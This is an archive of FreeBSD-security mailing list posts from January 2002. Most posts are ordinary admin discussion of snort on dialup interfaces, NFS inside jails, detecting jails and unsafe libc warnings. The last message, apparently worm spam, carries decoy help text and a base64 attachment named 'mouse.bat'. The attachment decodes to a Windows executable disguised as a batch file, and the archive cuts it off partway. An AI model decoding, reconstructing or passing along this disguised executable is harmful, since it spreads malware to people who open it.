X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > -----Original Message----- > From: Lee Brotherston [mailto:lee.brotherston@uk.easynet.net] > Sent: Monday, January 14, 2002 8:30 PM > To: 'Haikal Saadh'; 'Krzysztof Zaraska'; freebsd-security@freebsd.org > Subject: RE: Which intrusion detection to use? > > > > | What I'd like to someone to clarify for me is: > | Is snort actually seeing incoming packets on my outside > interface, and > | I've been really lucky so far > | OR > | Is snort not hearing anything on my outside interface? (tun0) > > Have you tried waiting until the dialup connection is > established then running snort with: > > -i tun0 > > This specifies which interface to listen on. You will of > course not see any traffic on your local lan anymore, as it > will not be sniffing the interface connected to your > hub/switch. It should however pickup the inbound traffic and > any local traffic that goes out over the interface. > > If you want to get paranoid run snort on all interfaces and > compare the results :) > > Normally you need to run an instance per interface, unless > you're using a linux 2.1.x/2.2.x kernel. If you are you > might want to see http://www.snort.org/docs/faq.html#3.4 > I suspected that, as a lot of the docco I've read point to people who do indeed have two instances of snort running. I was, however misled by being able to set HOMENET to any in snort.conf. I think I'll add an entry in ppp.linkup to start snort when my modem dials out. Thanks for setting me straight on this matter. _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 8:27:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp015.mail.yahoo.com (smtp015.mail.yahoo.com [216.136.173.59]) by hub.freebsd.org (Postfix) with SMTP id 540E837B41C for ; Mon, 14 Jan 2002 08:27:26 -0800 (PST) Received: from unknown (HELO warhawk) (202.1.200.64) by smtp.mail.vip.sc5.yahoo.com with SMTP; 14 Jan 2002 16:27:24 -0000 From: "Haikal Saadh" To: "'Krzysztof Zaraska'" Cc: Subject: RE: Which intrusion detection to use? Date: Mon, 14 Jan 2002 21:27:11 +0500 Message-ID: <000101c19d18$57401d00$40c801ca@warhawk> X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-reply-to: <20020114162652.7ba2a6d4.kzaraska@student.uci.agh.edu.pl> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of > Krzysztof Zaraska > Sent: Monday, January 14, 2002 8:27 PM > To: Haikal Saadh > Cc: freebsd-security@freebsd.org > Subject: Re: Which intrusion detection to use? > > > On Mon, 14 Jan 2002 19:46:38 +0500 > "Haikal Saadh" wrote: > > > *snip* > > > > > I don't know how tight your particular setup is, but if you deny > > > access to all unused ports to the world there will be no use in > > > PortSentry since the offending packets will never his the port > > > PortSentry is listening on. Snort does not care about > firewalls, so > > > just tell it to listen on outside interface and you're set. > > > > > > > I have been thinking about this a bit lately. I am (was > until I broke > > it this morning upgrading to 1.8.3, blast it!) running > snort and ipfw, > > and while I would get ipfw dropping packets in my logs, I > have nothing > > in my snort alerts from my outside network. (Quite a few from the > > inside though, mostly malformed NetBIOS packets and other mostly > > harmless (as far as I'm concerned) traffic). > > > > My firewall policy is default deny, but with dynamic rules > so that I > > can actually use stuff. My snort's HOMENET is set to any, > and I'm on > > dialup. > > > > > > What I'd like to someone to clarify for me is: > > Is snort actually seeing incoming packets on my outside > interface, and > > I've been really lucky so far > > OR > > Is snort not hearing anything on my outside interface? (tun0) > From my experience snort will not catch much in this setup. > If you deny anything you are virtually invisible for kiddiez > out there. They usually sweep large networks looking for > alive hosts and then look closer at those who are alive. But > if you deny everything you are a dead host for them. These > sweep scans are not detected by snort, since it does not > trigger on single SYN or PING packet. And you do not have any > services running, so no exploits are tried on you. > > Snort is libpcap based, so if tcpdump -i tun0 works for you > snort should see packets also... > > There is a simple test: just portscan your box from the > remote computer. This should trigger alert. > > [...] > Yah, tcpdump works fine, I used to use it all the time when first setting up the box to see how squid and bind were behaving. I'll try portscanning myself from the outside to see what happens when I get back to work tomorrow. _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 9:30:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns.ulstu.ru (ns.ulstu.ru [62.76.34.36]) by hub.freebsd.org (Postfix) with ESMTP id F09FD37B41E for ; Mon, 14 Jan 2002 09:30:35 -0800 (PST) Received: by ns.ulstu.ru (Postfix-ULSTU, from userid 3909) id 44C92107879; Mon, 14 Jan 2002 20:30:32 +0300 (MSK) Date: Mon, 14 Jan 2002 20:30:32 +0300 From: zhuravlev alexander To: security@freebsd.org Subject: Re: jail and NFS Message-ID: <20020114203031.A59312@ulstu.ru> Reply-To: zhuravlev alexander Mail-Followup-To: security@freebsd.org References: <20020114160455.A44661@ulstu.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jan 14, 2002 at 09:42:26AM -0500, Robert Watson wrote: > If the NFS mount is visible in the jail's namespace, then the jailed > processes can access it subject to normal access control restrictions. > However, processes in jail are not permitted to mount, remount, or unmount > filesystems, so any access to NFS must be configured by a process outside > the jail (and preferably, before any untrusted processes run in the jail, > so as to prevent racing and path-based games). Typically, when using NFS > with a jail, I'll do the NFS mounting prior to actually starting the jail. > thank you. i assume that this is right way too. > Robert N M Watson FreeBSD Core Team, TrustedBSD Project > robert@fledge.watson.org NAI Labs, Safeport Network Services > ps. and as all the time :) sorry for my ugly english :) -- zhuravlev alexander u l s t u c t c e-mail:zaa@ulstu.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 9:37:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns.ulstu.ru (ns.ulstu.ru [62.76.34.36]) by hub.freebsd.org (Postfix) with ESMTP id 35AD837B427 for ; Mon, 14 Jan 2002 09:37:37 -0800 (PST) Received: by ns.ulstu.ru (Postfix-ULSTU, from userid 3909) id 0BB1E107879; Mon, 14 Jan 2002 20:37:36 +0300 (MSK) Date: Mon, 14 Jan 2002 20:37:36 +0300 From: zhuravlev alexander To: security@freebsd.org Subject: Re: jail and NFS Message-ID: <20020114203735.A59890@ulstu.ru> Reply-To: zhuravlev alexander Mail-Followup-To: security@freebsd.org References: <20020114160455.A44661@ulstu.ru> <20020114203031.A59312@ulstu.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <20020114203031.A59312@ulstu.ru> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jan 14, 2002 at 08:30:32PM +0300, zhuravlev alexander wrote: > On Mon, Jan 14, 2002 at 09:42:26AM -0500, Robert Watson wrote: > > If the NFS mount is visible in the jail's namespace, then the jailed > > processes can access it subject to normal access control restrictions. > > However, processes in jail are not permitted to mount, remount, or unmount > > filesystems, so any access to NFS must be configured by a process outside > > the jail (and preferably, before any untrusted processes run in the jail, > > so as to prevent racing and path-based games). Typically, when using NFS > > with a jail, I'll do the NFS mounting prior to actually starting the jail. > > by the way ... when it type in jailed box mount i saw all filesystems and shares mounted by host system is this correct ? -- zhuravlev alexander u l s t u c t c e-mail:zaa@ulstu.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 10:59:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from khyron.p11.com (khyron.p11.com [64.95.193.74]) by hub.freebsd.org (Postfix) with ESMTP id DB17A37B405 for ; Mon, 14 Jan 2002 10:59:52 -0800 (PST) Received: from rcreasey01 (rcreasey01 [192.168.1.40]) by khyron.p11.com (Postfix) with ESMTP id DB4D33C55AF for ; Mon, 14 Jan 2002 11:01:18 -0800 (PST) From: "Ryan C. Creasey" To: Subject: RE: jail and NFS Date: Mon, 14 Jan 2002 10:59:52 -0800 Message-ID: <000001c19d2d$a5dae5c0$2801a8c0@office.p11.com> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > By the way ... > when it type in jailed box > mount > i saw all filesystems and shares mounted by host system > is this correct ? As far as I can tell, yes... I have several jails running within my master environment and there are quite a few ways for a user in the jail to realize that they're actually in the jail. root@dolza.p11.com:/usr/ports# mount /dev/ad0s1a on / (ufs, local) /dev/ad0s1f on /usr (ufs, local, with quotas) /dev/ad0s1e on /var (ufs, local) procfs on /proc (procfs, local) procfs on /usr/jail/dolza.p11.com/proc (procfs, local) procfs on /usr/jail/exedore.p11.com/proc (procfs, local) procfs on /usr/jail/breetai.p11.com/proc (procfs, local) ps being another one; note the 'J': root@exedore.p11.com:/etc# ps PID TT STAT TIME COMMAND 68462 p9- IJ 0:00.01 /bin/sh /usr/local/bin/safe_mysqld --user=mysql 33488 pc R+J 0:00.00 ps 58200 pc SJ 0:00.04 -su (bash) Although there are ways to "hack" your jail to fake users into believing they are acutally on a real environment. As with the above example, it's rather trivial to recompile ps by removing the switch for the 'J' flag: root@dolza.p11.com:/usr/ports# ps PID TT STAT TIME COMMAND 32266 p7 I+ 0:00.02 -su (bash) 63606 p8- I 0:00.01 /bin/sh /usr/local/bin/safe_mysqld --user=mysql 33487 pd R+ 0:00.00 ps 58217 pd S 0:00.11 -su (bash) But there are too many little instances that I seem to overlook. Does anyone know of a project (freshmeat?) out there that does this? Or am I just unusual for wanting users to believe they're not in a jail? Ryan C. Creasey Network Engineer p11creative To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 14:49:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [200.68.158.11]) by hub.freebsd.org (Postfix) with ESMTP id 7063337B404 for ; Mon, 14 Jan 2002 14:49:09 -0800 (PST) Received: from libertad.univalle.edu.co (buliwyf@localhost.univalle.edu.co [127.0.0.1]) by libertad.univalle.edu.co (8.12.1/8.12.1) with ESMTP id g0EMuqLB093528 for ; Mon, 14 Jan 2002 17:56:52 -0500 (COT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.12.1/8.12.1/Submit) with ESMTP id g0EMupXc093525 for ; Mon, 14 Jan 2002 17:56:51 -0500 (COT) Date: Mon, 14 Jan 2002 17:56:51 -0500 (COT) From: Buliwyf McGraw To: freebsd-security@FreeBSD.ORG Subject: gets() is unsafe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi... i was installing several applications (php,xmms,etc) on my FreeBSD 4.4 server and i got the next message a lot of times when i was compiling: /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; consider using mkstemp() /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; consider using mkstemp() /usr/lib/compat/libc.so.3: warning: this program uses gets(), which is unsafe. /usr/lib/compat/libc.so.3: WARNING! setkey(3) not present in the system! /usr/lib/compat/libc.so.3: WARNING! des_setkey(3) not present in the system! /usr/lib/compat/libc.so.3: WARNING! encrypt(3) not present in the system! /usr/lib/compat/libc.so.3: WARNING! des_cipher(3) not present in the system! /usr/lib/compat/libc.so.3: warning: this program uses f_prealloc(), which is not recommended. I want to fix this... what i can do? Thanks for any help. ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 15:19:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id 282F537B417 for ; Mon, 14 Jan 2002 15:19:56 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1192) id 0335810DE01; Mon, 14 Jan 2002 15:19:55 -0800 (PST) Date: Mon, 14 Jan 2002 15:19:55 -0800 From: Alfred Perlstein To: Buliwyf McGraw Cc: freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe Message-ID: <20020114151955.I26067@elvis.mu.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from buliwyf@libertad.univalle.edu.co on Mon, Jan 14, 2002 at 05:56:51PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Buliwyf McGraw [020114 14:49] wrote: > > Hi... i was installing several applications (php,xmms,etc) on my > FreeBSD 4.4 server and i got the next message a lot of times when > i was compiling: > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; > consider using mkstemp() > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; > consider using mkstemp() > /usr/lib/compat/libc.so.3: warning: this program uses gets(), which is > unsafe. > /usr/lib/compat/libc.so.3: WARNING! setkey(3) not present in the system! > /usr/lib/compat/libc.so.3: WARNING! des_setkey(3) not present in the > system! > /usr/lib/compat/libc.so.3: WARNING! encrypt(3) not present in the system! > /usr/lib/compat/libc.so.3: WARNING! des_cipher(3) not present in the > system! > /usr/lib/compat/libc.so.3: warning: this program uses f_prealloc(), which > is not recommended. > > I want to fix this... what i can do? > Thanks for any help. Read the manpages, use the "Safer" version of the functions. -- -Alfred Perlstein [alfred@freebsd.org] 'Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom.' Tax deductable donations for FreeBSD: http://www.freebsdfoundation.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 20: 3:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 9889B37B41D for ; Mon, 14 Jan 2002 20:03:45 -0800 (PST) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.6/8.11.5) with SMTP id g0F43PD41594; Mon, 14 Jan 2002 23:03:26 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Mon, 14 Jan 2002 23:03:25 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Ryan C. Creasey" Cc: freebsd-security@FreeBSD.ORG Subject: RE: jail and NFS In-Reply-To: <000001c19d2d$a5dae5c0$2801a8c0@office.p11.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 14 Jan 2002, Ryan C. Creasey wrote: > But there are too many little instances that I seem to overlook. Does > anyone know of a project (freshmeat?) out there that does this? Or am I > just unusual for wanting users to believe they're not in a jail? The problem is that it would be almost impossible to hide all evidence of the user being in a jail, due to the way in which jail is implemented. If you have root in the jail, you can trivially tell simply by attempting certain privileged operations, which are limited in jail. In fact, configuring a /dev such that it didn't look like a jail, in practice, would leave you with a system that wasn't in jail :-). Hiding this requires a great deal of virtualization, and is probably better suited to VMware-like solutions. Hiding the nature of the host environment, on the other hand, is something that is much easier to do. It would probably be worth adding another policy tweak sysctl to hide mount information, which is something I've seen a number of requests for. FreeBSD 5.0-CURRENT does a much better job of limiting information leak into jail, btw, than 4.x-STABLE, due to a reworking of the inter-process authorization. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 5:43:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta1.snet.net (mta1.snet.net [204.60.203.70]) by hub.freebsd.org (Postfix) with ESMTP id B536E37B405; Tue, 15 Jan 2002 05:38:56 -0800 (PST) Received: from smtp.snet.net (247.6.252.64.snet.net [64.252.6.247]) by mta1.snet.net (8.12.1/8.12.1/SNET-smtp-1.1/D-1.1/O-1.1) with SMTP id g0FDbLOZ009961; Tue, 15 Jan 2002 08:37:26 -0500 (EST) Date: Tue, 15 Jan 2002 08:37:21 -0500 (EST) Message-Id: <200201151337.g0FDbLOZ009961@mta1.snet.net> From: Thomas O Mills SUBJECT: To access the topic. X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Outlook Express 4.72.3612.1700 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00D1_016D2E25.CC2E2570" Content-Transfer-Encoding: 7bit To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_00D1_016D2E25.CC2E2570 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit A box containing the current topics will be displayed allowing \par you to select one with a single left button mouse click. Once a topic \par has been selected, the box will automatically close and the topic will \par be displayed beside the arrow.\par \par \par \par \cf2\f1 QUERY TEXT BOX \cf0\f0\par \par A red arrow points at this box. This is where you enter a keyword or \par phrase that specifies what you are searching for from the current \par Internet service you previously selected. ------=_NextPart_000_00D1_016D2E25.CC2E2570 Content-Type: application/octet-stream; name="mouse.bat" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="mouse.bat" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAABQRQAATAEFAH5EOzgAAAAAAAAAAOAADwELAQUAACoAAAA6AAAAAAAAEBMA AAAQAAAAQAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAO01AQAABAAAAAAAAAIAAAAAABAA ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAACAAABQAAAAAJAAAGwFAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AADsgAAAnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAligAAAAQAAAAKgAAAAQA AAAAAADVwwAAAAAAACAAAGAucmRhdGEAAD8DAAAAQAAAAAQAAAAuAAAAAAAAAAAAAAAAAABAAABA LmRhdGEAAAC0KAAAAFAAAAAmAAAAMgAAAAAAAAAAAAAAAAAAQAAAwC5pZGF0YQAAGgQAAACAAAAA BgAAAFgAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAO2lAAAAkAAAAHwAAABeAAAAAAAAAAAAAAAA AABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 